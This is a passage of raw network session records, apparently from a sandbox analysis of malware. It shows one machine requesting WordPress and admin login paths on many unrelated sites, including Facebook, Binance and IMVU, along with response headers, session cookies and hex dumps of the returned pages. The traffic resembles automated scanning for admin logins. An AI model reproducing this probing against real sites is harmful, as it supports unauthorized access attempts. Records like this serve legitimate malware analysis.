                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC113INHTTP/1.1 439 <none>
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                                                                                                                                                                                connection: close


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                198192.168.2.665445201.134.41.61443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC237OUTGET /academico/login HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: academico.um.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: JSESSIONID=8762699CA49BCC3318B1609C54D1F4A0
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC407INHTTP/1.1 200
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=ISO-8859-1
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-MX
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 2695
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC2695INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 09 3c 74 69 74 6c 65 3e 53 69 73 74 65 6d 61 20 41 63 61 64 e9 6d 69 63 6f 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 53 48 4f 52 54 43 55 54 20 49 43 4f 4e 22 20 68 72 65 66 3d 22 69 6d 61 67 65 6e 65 73 2f 69 63 6f 41 63 2e 70 6e 67 22 3e 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 6f 67 69 6e 53 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 53 54 59 4c 45 53 48 45 45 54 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Sistema Acadmico</title><link rel="SHORTCUT ICON" href="imagenes/icoAc.png"><link href="loginStyle.css" rel="STYLESHEET" type="text/cs


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                199192.168.2.66542731.13.88.1443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC180OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: th-th.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC390INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.facebook.com/wp-login.php?locale=th_TH&_rdr
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                                                                                                                                                                                                X-FB-Debug: 0/N4lH0Q3iw7nZpo/7nNdCznBmKuOXM4gzfaOBdgso7NdZu8uNITWaqgDBflS1LslMsMMITQZ6TiRCCE/yPzUQ==
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                200192.168.2.665532188.212.100.154443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC173OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: zarkana2.ro
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC415INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                                                                                                                                                                                content-length: 796
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:17:38 GMT
                                                                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC796INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                201192.168.2.66530487.233.198.20443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC184OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: idp.uitgeverij-deviant.nl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC976INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-store,no-cache
                                                                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                server:
                                                                                                                                                                                                                                                                                                                                                                request-context: appId=cid-v1:72342c18-c46f-45ce-b189-a032422cefba
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: default-src 'self';script-src 'self' 'sha256-7F67Tt3rqGzZ4RuGnAw8xbWeXLl7P0SNrI9EOIYYRdw=' 'nonce-VGkIlrwC+3QyRKgUNfGm9ZbTZRACXydeodCKpguaaQ8=';style-src 'self';font-src 'self' fonts.gstatic.com;img-src 'self' data: https://www.gravatar.com/avatar/;media-src 'none';object-src 'none';frame-ancestors 'self';frame-src 'self';report-uri https://uitgeverijdeviant.report-uri.com/r/t/csp/enforce
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By:
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                set-cookie: SERVERID=api04; path=/; Secure
                                                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC2114INData Raw: 38 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6e 6c 2d 4e 4c 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 2f 61 70 70
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 836<!DOCTYPE html><html lang="nl-NL"> <head> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"/> <link rel="apple-touch-icon" sizes="180x180" href="/app


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                202192.168.2.64943331.13.65.1443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC296OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: hi-in.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: datr=e8PAZQti-we2Cxw2VrrmnDbW; ps_n=0; ps_l=0
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://m.facebook.com/wp-login.php?locale=hi_IN&_rdr
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC387INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.facebook.com/wp-admin/?locale=hi_IN&_rdr
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                                                                                                                                                                                                X-FB-Debug: NRLKoY5Ig+fFwMndlzbTpcNuF2H8nwepVplLQAg5qNBozHcNKqbEof3r8VwtmesXpyBUWVTgv9I6VLoVMkpP0w==
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                203192.168.2.64938731.13.65.1443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC178OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: web.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC377INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.facebook.com/wp-login.php?_rdr
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                                                                                                                                                                                                X-FB-Debug: MebsYkB8zzbOCtOTFQRQBGmjSc369cdjAwJWGKNoJK/S6OlcxrIRkPZnW587F1fdYMINhyCkkmUHR9DhrUsYDQ==
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                204192.168.2.6653133.161.136.2443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC182OUTGET /en/wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.binance.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC928INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Tuser
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                ETag: "65bd03dd-f119"
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Fri, 02 Feb 2024 15:01:49 GMT
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: theme=dark; Path=/; Domain=binance.com
                                                                                                                                                                                                                                                                                                                                                                X-Cache-Proxy: hit
                                                                                                                                                                                                                                                                                                                                                                X-Cache-Proxy-Key: cpv2_gzip_e86434c508c20485933072836cba016a
                                                                                                                                                                                                                                                                                                                                                                X-Cluster-Info: fe-com-r1
                                                                                                                                                                                                                                                                                                                                                                X-Envoy-Decorator-Operation: cache-proxy.cache-proxy.svc.cluster.local:80/*
                                                                                                                                                                                                                                                                                                                                                                X-Envoy-Upstream-Service-Time: 2
                                                                                                                                                                                                                                                                                                                                                                X-Gateway: traefik
                                                                                                                                                                                                                                                                                                                                                                X-Trace-Id: 8ff76971352147b0966f625d21e44f27
                                                                                                                                                                                                                                                                                                                                                                X-Traefik-Duration: 1.00
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 69511c9d4d06d08392dd2d9b02ccc678.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P4
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: S8QZccpTl-M-yC2bocuhdZSZVG7S92uVjYvfrdrrap1U3-7ZHWf74w==
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC15456INData Raw: 36 32 38 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 73 63 72 69 70 74 20 69 64 3d 22 4f 6e 65 54 72 75 73 74 2d 73 64 6b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 61 67 65 6e 74 20 3d 20 74 79 70 65 6f 66 20 6e 61 76 69 67 61 74 6f 72 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 3f 20 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 20 3a 20 27 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 52 45 47 45 58 5f 4d 41 54 43 48 5f 43 4c 49 45 4e 54 5f 54 59 50 45 20 3d 20 2f 42 4e 43 5c 2f 28 5b 30 2d 39 2e 5d 2b 29 20 5c 28 28 5b 61 2d 7a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 628e<!doctype html><html dir="ltr"><head> <script id="OneTrust-sdk"> (function() { const agent = typeof navigator !== 'undefined' ? navigator.userAgent : ''; const REGEX_MATCH_CLIENT_TYPE = /BNC\/([0-9.]+) \(([a-z
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC9782INData Raw: 7c 74 72 69 64 65 6e 74 2f 69 5d 2c 64 65 73 63 72 69 62 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 6e 61 6d 65 3a 22 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 22 7d 2c 72 3d 53 2e 67 65 74 46 69 72 73 74 4d 61 74 63 68 28 2f 28 3f 3a 6d 73 69 65 20 7c 72 76 3a 29 28 5c 64 2b 28 5c 2e 3f 5f 3f 5c 64 2b 29 2b 29 2f 69 2c 65 29 3b 72 65 74 75 72 6e 20 72 26 26 28 74 2e 76 65 72 73 69 6f 6e 3d 72 29 2c 74 7d 7d 2c 7b 74 65 73 74 3a 5b 2f 5c 73 65 64 67 5c 2f 2f 69 5d 2c 64 65 73 63 72 69 62 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 6e 61 6d 65 3a 22 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 22 7d 2c 72 3d 53 2e 67 65 74 46 69 72 73 74 4d 61 74 63 68 28 2f 5c 73 65 64 67 5c 2f 28 5c 64 2b 28 5c 2e 3f 5f 3f 5c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: |trident/i],describe:function(e){var t={name:"Internet Explorer"},r=S.getFirstMatch(/(?:msie |rv:)(\d+(\.?_?\d+)+)/i,e);return r&&(t.version=r),t}},{test:[/\sedg\//i],describe:function(e){var t={name:"Microsoft Edge"},r=S.getFirstMatch(/\sedg\/(\d+(\.?_?\
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC882INData Raw: 33 36 62 0d 0a 42 28 6f 29 3f 6f 3a 53 74 72 69 6e 67 28 6f 29 29 2c 6e 29 7d 76 61 72 20 69 2c 6f 7d 63 6f 6e 73 74 20 6a 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 76 61 72 20 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3b 69 66 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 7d 28 74 68 69 73 2c 65 29 2c 6e 75 6c 6c 3d 3d 74 7c 7c 22 22 3d 3d 3d 74 29 74 68 72 6f 77 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 36bB(o)?o:String(o)),n)}var i,o}const j=function(){function e(t){var r=arguments.length>1&&void 0!==arguments[1]&&arguments[1];if(function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,e),null==t||""===t)throw
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC16384INData Raw: 33 66 66 61 0d 0a 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 61 72 73 65 64 52 65 73 75 6c 74 2e 62 72 6f 77 73 65 72 3f 74 68 69 73 2e 70 61 72 73 65 64 52 65 73 75 6c 74 2e 62 72 6f 77 73 65 72 3a 74 68 69 73 2e 70 61 72 73 65 42 72 6f 77 73 65 72 28 29 7d 7d 2c 7b 6b 65 79 3a 22 67 65 74 42 72 6f 77 73 65 72 4e 61 6d 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 3f 53 74 72 69 6e 67 28 74 68 69 73 2e 67 65 74 42 72 6f 77 73 65 72 28 29 2e 6e 61 6d 65 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7c 7c 22 22 3a 74 68 69 73 2e 67 65 74 42 72 6f 77 73 65 72 28 29 2e 6e 61 6d 65 7c 7c 22 22 7d 7d 2c 7b 6b 65 79 3a 22 67 65 74 42 72 6f 77 73 65 72 56 65 72 73 69 6f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 3ffa",value:function(){return this.parsedResult.browser?this.parsedResult.browser:this.parseBrowser()}},{key:"getBrowserName",value:function(e){return e?String(this.getBrowser().name).toLowerCase()||"":this.getBrowser().name||""}},{key:"getBrowserVersio
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC16384INData Raw: 0d 0a 34 62 32 36 0d 0a 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3a 7b 7d 3b 74 25 32 3f 69 28 4f 62 6a 65 63 74 28 72 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 61 28 65 2c 74 2c 72 5b 74 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 72 29 29 3a 69 28 4f 62 6a 65 63 74 28 72 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 4f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 4b26ull!=arguments[t]?arguments[t]:{};t%2?i(Object(r),!0).forEach((function(t){a(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):i(Object(r)).forEach((function(t){Object.defineProperty(e,t,O
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC2864INData Raw: 45 52 22 3a 22 4e 54 45 77 4d 7a 63 31 4f 44 59 77 4d 54 6f 34 61 54 68 75 62 6b 6c 73 61 57 56 74 54 47 5a 44 55 6e 5a 54 4e 31 5a 79 54 7a 68 49 56 32 68 43 64 45 4a 46 61 44 45 32 5a 77 3d 3d 22 2c 22 47 4f 4f 47 4c 45 5f 43 4c 49 45 4e 54 5f 49 44 22 3a 22 39 36 30 38 32 31 34 32 35 36 33 30 2d 61 63 6c 73 65 73 75 36 36 32 70 61 74 72 68 68 71 39 35 69 75 75 69 6a 65 6b 67 67 31 35 70 33 2e 61 70 70 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 22 2c 22 41 50 50 4c 45 5f 43 4c 49 45 4e 54 5f 49 44 22 3a 22 63 6f 6d 2e 63 7a 7a 68 61 6f 2e 62 69 6e 61 6e 63 65 2e 63 6c 69 65 6e 74 22 2c 22 50 55 42 4c 49 43 5f 55 52 4c 22 3a 22 68 74 74 70 73 3a 2f 2f 62 69 6e 2e 62 6e 62 73 74 61 74 69 63 2e 63 6f 6d 2f 5f 6e 65 78 74 22 2c 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ER":"NTEwMzc1ODYwMTo4aThubklsaWVtTGZDUnZTN1ZyTzhIV2hCdEJFaDE2Zw==","GOOGLE_CLIENT_ID":"960821425630-aclsesu662patrhhq95iuuijekgg15p3.apps.googleusercontent.com","APPLE_CLIENT_ID":"com.czzhao.binance.client","PUBLIC_URL":"https://bin.bnbstatic.com/_next","
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                205192.168.2.66535554.183.63.241443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC223OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pt.secure.imvu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: osCsid=75ead7575354d04015590554959bc526
